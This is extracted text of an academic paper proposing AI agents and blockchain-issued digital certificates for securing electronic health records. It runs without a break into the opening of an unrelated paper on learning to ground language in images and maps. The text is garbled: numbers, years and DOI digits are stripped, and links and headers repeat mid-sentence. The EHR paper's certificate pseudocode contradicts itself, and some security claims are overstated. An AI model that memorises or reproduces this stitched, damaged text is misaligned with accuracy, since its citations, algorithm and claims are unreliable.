How to cite this article: Alruwaili FF. Artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records. PeerJ Comput. Sci. :e doi . /peerj-cs.
Submitted August, accepted November, published November. Corresponding author: Fahad F. Alruwaili, alruwaili@su.edu.sa. Academic editor: Faizal Khan. Additional information and declarations can be found at the end of the article.

Introduction
The rapid digitization of healthcare has led to the creation of huge electronic records of patients. This progress creates unparalleled demands for the protection of healthcare data when these data are used and transferred. E-health systems can be a better alternative for maintaining the medical records globally
copyright alruwaili distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:alruwaili@�su.�edu.�sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ and connectedly and can be further accessed the clinical information on the basis of its requirement (wiljer et al., ). there is a rapid increase in the applicants of ehr in e-health which uses the mobile based devices in order to provide medical assistance. some of the medical services such as acquisition of data through online, and also in person, transferring these data towards other medical service providers etc. the ehr is a digital based medical data preserving and processing platform which is easily accessible to the patient as well as the doctors (zurita & nøhr, ). the main aim of this ehr is to monitor and to maintain the patients’ medical data more securely. this includes the overall medical history of the patient, current health condition, demographic details about the patient etc. this ehr acts as a repository for storing, transferring the medical data more securely (kumar & lee, ). the patient, doctor and the medical service provider can fetch the data whenever and where ever necessary. service providers need to update the given services to maintain consistency. in fact, various regulations and standards have been proposed by earlier researchers (oecd, ) in order to protect the privacy of ehr. these rules and regulations require tough measures of security while sharing and exchanging the health data. if the sharing failed to follow the rules, strong sanctioned were imposed on the violators with severe penalties. the introduction of ai and multi-agent based systems into the health data make it easy for the management to take its decisions and the actions, and ensures the communication and coordination by minimizing the errors of analysis and treatment, and by improve time required to look for the medical resources, and other medical departments. the main goal of ai-based ehr security is to create methodology, tools, and facilities for the maintenance and transfer of health data through the ehr. electronic health records are live and systems based on the patient. this makes the patient data to be accessed and handled by users who are authorized to use it. these data are in a digital format which is collected based on the already developed standards for maintaining the patients’ health records. in this ehr, the data can be handled by the patient or an authorized doctor and the service provider. it is stored in a cloud-based servers which can be accessed only by the users (zhang et al., ; shinde & patil, ). the users and the data were connected through a network. all the requests and transmissions were done through the network (shinde & patil, ). though there were various advantages present in this ehr, it is more vulnerable to various types of attacks. this is due to its design architecture (om & talib, ). various threats in the level of collecting data (habib, torjusen & leister, ; saleem, ullah & kwak, ; chelli, ; kumar & lee, ; saleem, ullah & yoo, ; om & talib, ), transmission (ismail & ammar, ; partala et al., ; niksaz, ; bonab & masdari, ), and storage (santos-pereira et al., ; zhang & liu, ; drosatos et al., ; fatema & brad, ; wellington, ) were present in this ehr’s. 
due to these threats, some of the users are concerned to employ this ehr to save and transmit their health data (ismail & ammar, ). hence, a novel methodology for providing privacy and security combining the ai-based intelligent agents and blockchain is proposed in this article. alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contributions of the present research � various techniques were proposed earlier researchers for enhancing the security and electronic based health record. enhancement of ehr systems are under process. � a proposal of combining the ai, agent based systems along with the blockchain based technology for providing privacy and security in the electronic health record. � the proposed ai-based dls technology achieves better accuracy in providing security and privacy while utilizing and sharing the ehr data. this research work is done in order to analyze the drawbacks present in the existing privacy and security preserving methodologies for the ehr data sets and to propose a novel method for providing privacy and security in it. attributes of the distributed ledger technology � a dlt is a distributed digital record of transactions (zhang, zhong & tian, ; zhang et al., ). the terminology comes from its structure, where, the individual records called blocks. these blocks are linked together with each other, and in accordance with the implemented consensus protocol, in single list which is called a chain. the current implementation of dlt is now seeing in recording crypto currencies transactions. the notion of decentralization is core component; hence, any involved transactions cannot be altered without the alteration of all concurrent blocks. � the key characteristics of the dlt include � decentralization � persistency � anonymity and � auditability � the key advantages and features of dlt technologies, includes: � immutability: it means one-way writing to the ledger, hence difficult to tamper or alter a block or committed transaction. � irreversibility: it prevents double spending. � distribution of records: it means that a copy of the ledger is present with all its members. � no centralized authority or third party: it is a peer-to-peer network. � resiliency: it is not prone to any sort of major attacks. blockchain blockchain (dlt) is considered to be the next big technological revolution, as it is reinventing the way we work and live (zheng et al., ; perdana et al., ; sun et al., ). the structure of blockchain is shown in fig. . the idea of the dlt was first introduced by a researcher who implemented the digital crypto currency known as bitcoin. dlt has become an integral part of bitcoin’s operation (li et al., ). for several decades, researchers have been dealing with information exchange and the transfer of money and other assets through online transactions through the internet, where each of alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these transactions involved a trusted intermediary. it is provides a secure exchange and traceability in the event of any failures in case of a security breach. in a shift of paradigm, the dlt removes centralized authority which is present in-between multiple entities which are processing the financial and other transactions on data using a public ledger which is incorruptible, immutable, and decentralized in nature. 
the dlt based technology can come up with acceptable results in the certification system for learning, receivable to the non-changeable and the cryptographic nature of the data based on blockchain. it can complete complex transaction operations without human intervention. the system also supports automatic execution and automatic verification. smart contract technology can simplify the process of transaction, smart realization, making it automated and decentralized and to enhance the security of the transaction. ai and multi agent based systems ai is the process of recognizing something it has never seen before and predict the future, by extracting patterns in the past (harel, gal & elovici, ; bali, garg & bali, ). ai deals with the study and design of intelligent based agents which maintains the environment, takes actions which increases the chance for occurring success. intelligent agents or adaptive & self-organizing systems are autonomous based system which is more flexible in receiving and processing the input for generating the output with respect to the input. agent-based systems are communicating systems of distributed ai. these systems work by communicating with each other based on a set of rules and constraints in order to solve a common problem. however, agent-based systems usually consist of one learning ai agent and other pattern of ais. an ai-based multi-agent system is a computerized system which consists of multiple interacting intelligent agents. multi-agent systems can solve problems which are difficult for an individual system. these intelligent based agents can get the data in the form of knowledge directly from the users. these users can be also called as environment. intelligent agents can perform a specific task for the given inputs. these systems can process the inputs from humans or other form of agents. these agents can also be able to combine with other agents in order to perform a process. generating a system based on the intelligent agent is not a difficult process since it can be done just by combining the existing agents with agents. this forms the multi agent based architecture. for example, a network monitoring agent can be created by figure structure of blockchain. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ combining the network system with an agent by not altering the entire mechanism. architecture of an intelligent agent is shown in fig. . the security and privacy opportunity the dlt combined with ai integration presents a new and innovative approach to achieve smart, resilient and secure handling of ehr data. various works has been done by previous researchers regarding the security and privacy using the multi agent bases systems (tsochev et al., ; grzonka et al., ; ahmed et al., ; gruson et al., ; stein et al., ). the fact that increased adoption of autonomous systems e.g. internet of things, opens the door for insecure and cyber-criminal activities, hence a greater need to ensure security, control and compliance. with this increased connectivity and reliance of other healthcare systems across different healthcare stakeholders (e.g., pharmacy, imagery, prescriptions, physicians, insurance) a greater need for privacy protection to keep patients and hospitals records safe and secure is critical. the gap intensifies when urgent actions are needed to protect or recover ehr transactions against cyberattacks. 
the utility of greater intelligence in making decisions about threats and cyberattacks can be utilized. the ai agents are used to gather the necessary threats/cyberattacks information from multiple deployed sensors to help steer the decision making process. in addition, automation of actionable policies to protect ehr can be codified into a smart contracts with will be triggered based on the given event (if-then-else condition statement). figure shows the main important characteristics of the blockchain (dlt) and ai. proposed methodology the proposed methodology is designed to provide privacy and security in ehr database using the application of artificial intelligence and multi agent based distributed ledger system. this framework is secured since the blockchain and various software based figure architecture of the multi agent-based system. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ agents are used in between the data which are available in the public servers. in this method, the user has full privilege to access the system. the user can update, edit, modify and delete the contents present in the database which is connected with the system. architecture of the proposed system is shown in fig. which has two types intelligent agent such as the user interface agent, dlt based authentication agent. this forms the multi agent based technology. the user interface agent collects all the information about users who are accessing the database. the dlt based authentication agent generates a digital certificate for accessing or transferring the data from the server towards the connected devices. all these information’s were stored in the server. these intelligent dlt based multi agent systems provide the communication between users and the ehr service provider. flowchart of the proposed methodology is shown in fig. . the user interface agent is also responsible for defining the protocols for defining an accessing entity as a user. these protocols are based on the already set rules. a centralized server is used to stores all the health related information of the patient. this server is connected to the authentication agent. this server also called as the health record database consists of user credentials for accessing the entire ehr system. an authentication agent is an intelligent agent which is connected with the health record database or server which can be used to validate the entry of user. it is also used to verify the user credentials present in the health database. the proposed system consists of two intelligent based connected agents such as the user interface and the dlt based authentication agent. the authentication agent is also connected with the dlt based system which can only figure main characteristics of the blockchain (dlt) and ai. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant access to the users. this agent makes effective comparison of the already stored datasets of the users and the providers who are willing to access the datasets by issuing a digital certificate based on the blockchain technology. 
various operations such as user interface establishment, user registration, comparison of the already existing data, and its maintenance where depicted by this intelligent based agents. the basic information such as username, passwords, user credentials, birth date, mobile number etc. and all the necessary information related to the health regarding the patient are stored in the health record database or server. schematic representation of the proposed methodology is shown in fig. . working principle user interface agent acts as an interface between the user and the entire system. this user interface agent is used to establish the connection between the users and authentication agent. the user interface agent present in between the users and the authentication agent accept the sign in request from the user. the user can be a patient, a doctor or a provider healthcare. this user interface agent accepts the user credentials required for logging in. the user credentials can be a username and a password. the user interface agent is established through an application which can be either a website or a mobile based. figure flowchart of the proposed methodology. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the user can enter his user name and password in the provided interface. if the user forgot the username or password, it can be easily accessed by the security protocols functions present in the interface. the dlt based authentication agent receives the user name and password. all the user credentials received by the user interface agent were passed to the dlt based authentication agent for further accessing whether the credentials belongs to the saved users or not. the dlt based authentication agent checks the obtained user name and password of the user from the stored datasets. the username and passwords were already stored in the database as shown in fig. . after validating the credentials, it generates a digital certificate to the user. connection is established in between the server and the dlt based authentication agent for accessing the ehr data. the dlt based authentication agent present in between the user interface agent and the server generates a figure architecture of the proposed model. full-size doi: . /peerj-cs. /fig- figure schematic representation of the proposed methodology. full-size doi: . /peerj-cs. /fig- alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ digital certificate in order to access the data in terms of using as well as transferring. if the digital certificate is generated, then the user can access, transfer data towards the ehr server. by this method, the ehr data cannot be easily accessed by un-authorized users or by un-authorized login. overall architecture of the proposed model is shown in fig. . all the information regarding the logging in will be also stored in the database or the server in the form of references for next authentication process. if the credentials of the user who is willing to access the database is not stored in the server, then a user registration form will be provided so that the new user can register him for accessing the data. it is further analyzed by the authentication agent and it will grant permission to access based on the priority. 
Once the user is verified, he is granted permission to access the data, and a connection is established for the user to access the database.

Algorithm for the agent-based systems
Procedure for user verification:
begin
    initialize
    for every agent v and every user u:
        read the user credentials
        if (u = username & password) and ui = <u, p> then
            forward to the user interface agent
        else
            prompt for a valid username and password
        end if
    end for
end

Procedure for the user interface agent:
begin
    initialize each agent ai in v
    initialize a to-do list lij for vi
    check the user and its interface
    read the user credentials
    if u = <ui> then
        forward to the DLT-based authentication agent
    else
        reject the request as an unauthorised user
    end if
end

Algorithm for generating digital certificates
The main module of the proposed algorithm starts with a login process. A user can log in through the user interface agent with the starting time set to zero. The allowed login window is h, within which the system allows the user to obtain a digital certificate. Once the user verification is done, the user particulars are updated on the server. If the user has not already obtained a smart contract, the user particulars are entered into the digital certificate, with the user address stored in the DC. The user particulars are then sent to the smart contract execution process. Once the user particulars have been updated, the system produces a digital certificate. The algorithm for generating a digital certificate is shown below:

login = ok, start_time = 0, user_verification = ok
if login == valid and start_time >= hour then
    update user_particulars
    smart_contract = no
    if login == not valid or start_time <= hour then
        dc = digital_certificate(user_particulars)
        address = dc_address
        send user_particulars to address
        execute smart_contract = sc_address(user_particulars)
        if smart_contract == ok then
            add block_credit to dc_blockchain
            issue(digital_certificate)
        end if
    end if
end if

Motivation and scope
- The proposed methodology keeps the health data privacy-preserved and secured.
- The proposed system is monitored and maintained by the AI-based multi-agent systems.
- The proposed system consists of two connected intelligent agents, namely the user interface agent and the DLT-based authentication agent.
- These multi-agents are used to validate the user and also to generate the digital certificates.
- Digital certificates are generated by blockchain-based intelligent agents to restrict unauthorized users.
- AI and blockchain based intelligent agents communicate between the users and the EHR server through the network.

Comparison with existing methods
In this section, a detailed comparison between the proposed methodology and existing methods for providing privacy and security for health datasets is presented. In the CARE model, an intelligent agent-based system is employed in which every entity and its role are monitored. In the patient-centered multi-agent system, intelligent agents are assigned only to individual patients. In the agent-based medical server and wireless sensor network, individual agents are assigned to all the entities, that is, the patient, supervisor, doctor, and manager.
In algorithms based on biometric technologies, EEG, ECG, and fingerprint sensors were employed for authentication. In the proposed method, intelligent multi-agents along with the DLT-based system are used for user authentication and for providing access to the EHR datasets. A table compares the techniques used in various e-health security methods.

Conclusion and future work
E-health systems can be a better alternative for maintaining medical records globally and in a connected way, so that clinical information can be accessed as required. Due to the rapid growth in users of EHR, e-health, and m-health, applications based on mobile devices that provide medical services such as online data collection face challenges in securing, storing, and accessing the data. A patient's health record, which is used in various treatments, should be secured; these records are used by various doctors and healthcare specialists while providing treatment to patients. A combination of AI-based intelligent agents and blockchain technology is proposed in this article in order to protect the EHR from unauthorized access and usage. Intruders can change information, alter the entire data, introduce unauthenticated and false data, and so on. The proposed system avoids these types of attacks by unauthorized users with the help of intelligent agents and blockchain technology that generate a smart contract. The proposed architecture uses various AI-based intelligent agents and blockchain for the entire process. A future enhancement of this work can be the addition of biometric based systems for improved security.

Table: Comparison of techniques for various EHR security methods.
EHR security method | Technique used
CARE model | Modules for each actor and their role
Patient-centered multi-agent system | Agents for individual users
Body sensor network and agent-based medical server | Agents for patient, supervisor, doctor, and manager
Biometric based method | Electrocardiogram and fingerprint for authentication
Biometrics based method | Electrocardiogram and photoplethysmography for authentication
Proposed method | Blockchain along with multi-agents for user interface, authentication, and a smart contract for accessing the EHR data

Additional information and declarations
Funding
The author received no funding for this work.
Competing interests
The author declares that they have no competing interests.
Author contributions
- Fahad F. Alruwaili conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
Data availability
The following information was supplied regarding data availability: the code is available as a supplemental file.
Supplemental information
Supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information.

References
ahmed z, mohamed k, zeeshan s, dong xq. . artificial intelligence with multi-functional machine learning platform development for better healthcare and precision medicine. database :baaa doi . /database/baaa .
bali j, garg r, bali rt. .
artificial intelligence (ai) in healthcare and biomedical research: why a strong computational/ai bioethics framework is required? indian journal of ophthalmology ( ): – doi . /ijo.ijo_ _ . bonab th, masdari m. . security attacks in wireless body area networks: challenges and issues. academie royale des sciences d outre-mer bulletin des seances ( ): – . chelli k. . security issues in wireless sensor networks: attacks and countermeasures. in: proceedings of the world congress on engineering. drosatos g, efraimidis ps, williams g, kaldoudi e. . towards privacy by design in personal e-health systems. available at https://www.scitepress.org/papers/ / /pdf/index.html. fatema n, brad r. . security requirements, counterattacks and projects in healthcare applications using wsns: a review. arxiv preprint arxiv: . . gruson d, helleputte t, rousseau p, gruson d. . data science, artificial intelligence, and machine learning: opportunities for laboratory medicine and the value of positive regulation. clinical biochemistry : – doi . /j.clinbiochem. . . . grzonka d, jakóbik a, kołodziej j, pllana s. . using a multi-agent system and artificial intelligence for monitoring and improving the cloud performance and security. future generation computer systems : – doi . /j.future. . . . habib k, torjusen a, leister w. . security analysis of a patient monitoring system for the internet of things in ehealth. in: proceedings of the international conference on ehealth, telemedicine, and social medicine (etelemed' ). alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /database/baaa http://dx.doi.org/ . /ijo.ijo_ _ https://www.scitepress.org/papers/ / /pdf/index.html http://dx.doi.org/ . /j.clinbiochem. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ harel y, gal ib, elovici y. . cyber security and the role of intelligent systems in addressing its challenges. acm transactions on intelligent systems and technology ( ): doi . / . ismail keshta, ammar odeh. . security and privacy of electronic health records: concerns and challenges. egyptian informatics journal doi . /j.eij. . . . kumar p, lee h-j. . security issues in healthcare applications using wireless medical sensor networks: a survey. sensors ( ): – doi . /s . li s, zhao s, yang p, andriotis p, xu l, sun q. . distributed consensus algorithm for events detection in cyber physical systems. ieee internet of things journal ( ): – doi . /jiot. . . niksaz p, young researchers and elite club, mashhad branch. . wireless body area networks: attacks and countermeasures. international journal of scientific & engineering research ( ): – . oecd. . recommendation of the council concerning guidelines governing the protection of privacy and transborder flows of personal data. c( ) /final, , – . available at https://www.oecd.org/sti/ieconomy/ -oecd-privacy-guidelines.pdf. om s, talib m. . wireless ad-hoc network under black-hole attack. international journal of digital information and wireless communications (ijdiwc) ( ): – . partala j, keräneny n, särestöniemi m, hämäläinen m, iinatti j, jämsä t, reponen j, seppänen t. . security threats against the transmission chain of a medical health monitoring system. 
in: ieee th international conference on e-health networking, applications & services (healthcom), – october , lisbon, portugal. piscataway: ieee. perdana a, robb a, balachandran v, rohde f. . distributed ledger technology: its evolutionary path and the road ahead. information & management. doi . /j.im. . . saleem s, ullah s, kwak ks. . a study of ieee . . security framework for wireless body area networks. sensors ( ): – doi . /s . saleem s, ullah s, yoo hs. . on the security issues in wireless body area networks. international journal of digital content technology and its applications ( ): – doi . /jdcta.vol .issue . . santos-pereira c, augusto ab, cruz-correia r, correia me. . a secure rbac mobile agent access control model for healthcare institutions. in: proceedings of the th ieee international symposium on computer-based medical systems. piscataway: ieee. shinde ss, patil d. . review on security and privacy for mobile healthcare networks: from a quality of protection perspective. international journal of engineering research ( ): – . stein jd, rahman m, andrews c, trager eh, narayanaswamy p, hanauer da. . evaluation of an algorithm for identifying ocular conditions in electronic health record data. jama ophthalmology ( ): – doi . /jamaophthalmol. . . sun x, zou j, li l, luo m. . a blockchain-based online language learning system. telecommunication systems doi . /s - - - . tsochev g, trifonov r, yoshinov r, manolov s, popov g, pavlova g. . some security model based on multi agent systems. in: international conference on control, artificial intelligence, robotics & optimization (iccairo). wellington k. . cyberattacks on medical devices and hospital networks: legal gaps and regulatory solutions. santa clara high technolohy law journal ( ): . alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /j.eij. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /jiot. . https://www.oecd.org/sti/ieconomy/ -oecd-privacy-guidelines.pdf http://dx.doi.org/ . /j.im. . http://dx.doi.org/ . /s http://dx.doi.org/ . /jdcta.vol .issue . http://dx.doi.org/ . /jamaophthalmol. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wiljer d, urowitz s, apatu e, delenardo c, eysenbach g, harth t, pai h, leonard kj, canadian committee for patient accessible health records. . patient accessible electronic health records: exploring recommendations for successful implementation strategies. journal of medical internet research ( ):e doi . /jmir. . zhang r, liu l. . security models and requirements for healthcare application clouds. in: ieee rd international conference on cloudcomputing. piscataway: ieee. zhang k, yang k, liang x, su z . . security and privacy for mobile healthcare networks: from a quality of protection perspective. ieee wireless communications. ( ): – . zhang y, wu s, jin b, du j. . a blockchain-based process provenance for cloud forensics. in: rd ieee international conference on computer and communications (iccc). piscataway: ieee, – . zhang n, zhong s, tian l. . using blockchain to protect personal privacy in the scenario of online taxi-hailing. international journal of computers communications & control ( ): – doi . /ijccc. . . . zheng z, xie s, dai hn, wang h. . blockchain challenges and opportunities: a survey. international journal of web and grid services ( ): – doi . /ijwgs. . . zurita l, nøhr c. . patient opinion-ehr assessment from the users perspective. 
studies in health technology and informatics ( ): – .
transactions of the association for computational linguistics, ( ) – . action editor: jason eisner. submitted / ; revised / ; published / . © association for computational linguistics.
jointly learning to parse and perceive: connecting natural language to the physical world jayant krishnamurthy computer science department carnegie mellon university jayantk@cs.cmu.edu thomas kollar computer science department carnegie mellon university tkollar@andrew.cmu.edu abstract this paper introduces logical semantics with perception (lsp), a model for grounded lan- guage acquisition that learns to map natu- ral language statements to their referents in a physical environment. for example, given an image, lsp can map the statement “blue mug on the table” to the set of image seg- ments showing blue mugs on tables. lsp learns physical representations for both cate- gorical (“blue,” “mug”) and relational (“on”) language, and also learns to compose these representations to produce the referents of en- tire statements. we further introduce a weakly supervised training procedure that estimates lsp’s parameters using annotated referents for entire statements, without annotated ref- erents for individual words or the parse struc- ture of the statement. we perform experiments on two applications: scene understanding and geographical question answering. we find that lsp outperforms existing, less expressive models that cannot represent relational lan- guage. we further find that weakly supervised training is competitive with fully supervised training while requiring significantly less an- notation effort. introduction learning the mapping from natural language to physical environments is a central problem for natu- ral language semantics. understanding this mapping is necessary to enable natural language interactions with robots and other embodied systems. for exam- ple, for an autonomous robot to understand the sen- tence “the blue mug is on the table,” it must be able to identify ( ) the objects in its environment corre- sponding to “blue mug” and “table,” and ( ) the ob- jects which participate in the spatial relation denoted by “on.” if the robot can successfully identify these objects, it understands the meaning of the sentence. the problem of learning to map from natural lan- guage expressions to their referents in an environ- ment is known as grounded language acquisition. in embodied settings, environments consist of raw sensor data – for example, an environment could be an image collected from a robot’s camera. in such applications, grounded language acquisition has two subproblems: parsing, learning the compositional structure of natural language; and perception, learn- ing the environmental referents of individual words. acquiring both kinds of knowledge is necessary to understand novel language in novel environments. unfortunately, perception is often ignored in work on language acquisition. other variants of grounded language acquisition eliminate the need for percep- tion by assuming access to a logical representation of the environment (zettlemoyer and collins, ; wong and mooney, ; matuszek et al., ; chen and mooney, ; liang et al., ). the existing work which has jointly addressed both pars- ing and perception has significant drawbacks, in- cluding: ( ) fully supervised models requiring large amounts of manual annotation and ( ) limited se- mantic representations (kollar et al., ; tellex et al., ; matuszek et al., ). this paper introduces logical semantics with perception (lsp), a model for grounded language acquisition that jointly learns to semantically parse language and perceive the world. 
lsp models a mapping from natural language queries to sets of ob- jects in a real-world environment. the input to lsp is an environment containing objects, such as a seg- (a) an environment containing objects (image segments). environment: (image on left) knowledge base query: “things to the right of the blue mug” semantic parse grounding: {( , ), ( , )} denotation: { , } (b) lsp predicting the environmental referents of a natural language query. language denotation the mugs { , } the objects on the table { , , } there is an lcd monitor { } is the blue mug right {} of the monitor? the monitor is behind { } the blue cup. (c) training examples for weakly su- pervised training. figure : lsp applied to scene understanding. given an environment containing a set of objects (left), and a natural language query, lsp produces a semantic parse, logical knowledge base, grounding and denotation (middle), using only language/denotation pairs (right) for training. mented image (figure a), and a natural language query, such as “the things to the right of the blue mug.” given these inputs, lsp produces ( ) a logi- cal knowledge base describing objects and relation- ships in the environment and ( ) a semantic parse of the query capturing its compositional structure. lsp combines these two outputs to produce the query’s grounding, which is the set of object referents of the query’s noun phrases, and its denotation, which is the query’s answer (figure b). weakly supervised training estimates parameters for lsp using queries annotated with their denotations in an environment (figure c). this work has two contributions. the first con- tribution is lsp, which is more expressive than pre- vious models, representing both one-argument cat- egories and two-argument relations over sets of ob- jects in the environment. the second contribution is a weakly supervised training procedure that esti- mates lsp’s parameters without annotated semantic parses, noun phrase/object mappings, or manually- constructed knowledge bases. we perform experiments on two different applica- tions. the first application is scene understanding, where lsp grounds descriptions of images in im- age segments. the second application is geograph- ical question answering, where lsp learns to an- swer questions about locations, represented as poly- gons on a map. in geographical question answering, we treat declarative sentences as if they were queries about their subject, e.g., the denotation of “the mug is on the table” is the set of mugs on tables. typically, the denotation of a sentence is either true or false; our treatment is strictly more general, as a sentence’s denotation is nonempty if and only if the sentence is true. lsp correctly answers % more questions than the most comparable state-of-the-art model (matuszek et al., ). in scene understanding, accuracy sim- ilarly improves by %. furthermore, weakly su- pervised training achieves an accuracy within % of that achieved by fully supervised training, while re- quiring significantly less annotation effort. prior work logical semantics with perception (lsp) is related to work from planning, natural language processing, computer vision and robotics. much of the related work focuses on interpreting natural language us- ing a fixed formal representation. some work con- structs integrated systems which execute plans in re- sponse to natural language commands (winograd, ; hsiao et al., ; roy et al., ; skubic et al., ; macmahon et al., ; levit and roy, ; kruijff et al., ). 
these systems parse natural language to a formal representation which can be executed using a set of fixed control pro- grams. similarly, work on semantic parsing learns to map natural language to a given formal repre- sentation. semantic parsers can be trained using sentences annotated with their formal representation (zelle and mooney, ; zettlemoyer and collins, ; kate and mooney, ; kwiatkowski et al., ) or various less restrictive annotations (clarke et al., ; liang et al., ; krishnamurthy and mitchell, ). finally, work on grounded lan- guage acquisition leverages semantic parsing to map from natural language to a formal representation of an environment (kate and mooney, ; chen and mooney, ; shimizu and haas, ; matuszek environment d know. base Γ mug( ) mug( ) blue( ) table( ) on-rel( , ) on-rel( , ) ... (a) perception fper produces a logical knowl- edge base Γ from the environment d using an independent classifier for each category and relation. language z “blue mug on table” logical form ` λx.∃y.blue(x) ∧ mug(x) ∧ on-rel(x,y) ∧ table(y) (b) semantic parsing fprs maps language z to a log- ical form `. grounding: g = {( , )}, denotation: γ = { } { } { } blue(x) { , } mug(x) {( , ), ( , )} {( , ), ( , )} on-rel(x,y) { } table(y) (c) evaluation feval evaluates a logical form ` on a logical knowledge base Γ to produce a grounding g and denotation γ. figure : overview of logical semantics with perception (lsp). et al., ; dzifcak et al., ; cantrell et al., ; chen and mooney, ). all of this work as- sumes that the formal environment representation is given, while lsp learns to produce this formal rep- resentation from raw sensor input. most similar to lsp is work on simultaneously understanding natural language and perceiving the environment. this problem has been addressed in the context of robot direction following (kollar et al., ; tellex et al., ) and visual attribute learning (matuszek et al., ). however, this work is less semantically expressive than lsp and trained using more supervision. the g model (kol- lar et al., ; tellex et al., ) assumes a one- to-one mapping from noun phrases to entities and is trained using full supervision, while lsp allows one-to-many mappings from noun phrases to entities and can be trained using minimal annotation. ma- tuszek et al. ( ) learns only one-argument cate- gories (“attributes”) and requires a fully supervised initial training phase. in contrast, lsp models two- argument relations and allows for weakly supervised supervised training throughout. logical semantics with perception logical semantics with perception (lsp) is a model for grounded language acquisition. lsp accepts as input a natural language statement and an environ- ment and outputs the objects in the environment de- noted by the statement. the lsp model has three components: perception, parsing and evaluation (see figure ). the perception component constructs logical knowledge bases from low-level feature- based representations of environments. the pars- ing component semantically parses natural language into lambda calculus queries against the constructed knowledge base. finally, the evaluation compo- nent deterministically executes this query against the knowledge base to produce lsp’s output. the output of lsp can be either a denotation or a grounding. a denotation is the set of entity refer- ents for the phrase as a whole, while a grounding is the set of entity referents for each component of the phrase. the distinction between these two outputs is shown in figure b. 
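to make these components concrete, the following is a small, hypothetical python sketch of the data structures involved: a logical knowledge base over one-argument categories and two-argument relations, and the difference between a grounding and a denotation for the blue-mug query discussed above. the representation and names are illustrative assumptions, not the authors' implementation.

```python
# illustrative data structures for the lsp pipeline; names are assumptions,
# not the authors' code.
from dataclasses import dataclass, field
from typing import Dict, Set, Tuple


@dataclass
class KnowledgeBase:
    # category name -> set of entity ids; relation name -> set of entity-id pairs
    categories: Dict[str, Set[int]] = field(default_factory=dict)
    relations: Dict[str, Set[Tuple[int, int]]] = field(default_factory=dict)


# a toy knowledge base for an image with entities 1..4
kb = KnowledgeBase(
    categories={"mug": {1, 2}, "blue": {1}, "table": {4}},
    relations={"on-rel": {(1, 4), (2, 4)}, "right-rel": {(2, 1), (3, 1)}},
)

# "things to the right of the blue mug":
# the grounding keeps every satisfying (x, y) pair, the denotation keeps only x.
grounding = {(x, y)
             for (x, y) in kb.relations["right-rel"]
             if y in kb.categories["blue"] and y in kb.categories["mug"]}
denotation = {x for (x, _) in grounding}
print(grounding)   # {(2, 1), (3, 1)}
print(denotation)  # {2, 3}
```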
in this example, the denotation is the set of “things to the right of the blue mug,” which does not include the blue mug itself. on the other hand, the grounding includes both the refer- ents of “things” and “blue mug.” only denotations are used during training, so we ignore groundings in the following model description. however, ground- ings are used in our evaluation, as they are a more complete description of the model’s understanding. formally, lsp is a linear model f that predicts a denotation γ given a natural language statement z in an environment d. as shown in figure , the struc- ture of lsp factors into perception (fper), semantic parsing (fprs) and evaluation (feval) components us- ing several latent variables: f(γ, Γ,`,t,z,d; θ) = fper(Γ,d; θper)+ fprs(`,t,z; θprs) + feval(γ, Γ,`) lsp assumes access to a set of predicates that take either one argument, called categories (c ∈ c) or two arguments, called relations (r ∈ r). these predicates are the interface between lsp’s percep- tion and parsing components. the perception func- tion fper takes an environment d and produces a log- the set of predicates are derived from our training data. see section . . γ feval Γd fper ℓ z fprs t figure : factor graph of lsp. the environment d and language z are given as input, from which the model predicts a logical knowledge base Γ, logical form `, syntactic tree t and denotation γ. ical knowledge base Γ that assigns truth values to instances of these predicates using parameters θper. this function uses an independent classifier to pre- dict the instances of each predicate. the seman- tic parser fprs takes a natural language statement z and produces a logical form ` and syntactic parse t using parameters θprs. the logical form ` is a database query expressed in lambda calculus nota- tion, constructed by logically combining the given predicates. finally, the evaluation function feval de- terministically evaluates the logical form ` on the knowledge base Γ to produce a denotation γ. these components are illustrated in figure . the following sections describe the percep- tion function (section . ), semantic parser (sec- tion . ), evaluation function (section . ), and in- ference (section . ) in more detail. . perception function the perception function fper constructs a logical knowledge base Γ given an environment d. the per- ception function assumes that an environment con- tains a collection of entities e ∈ ed. the knowl- edge base produced by perception is a collection of ground predicate instances using these entities. for example, in figure a, the entire image is the envi- ronment, and each image segment is an entity. the logical knowledge base Γ contains 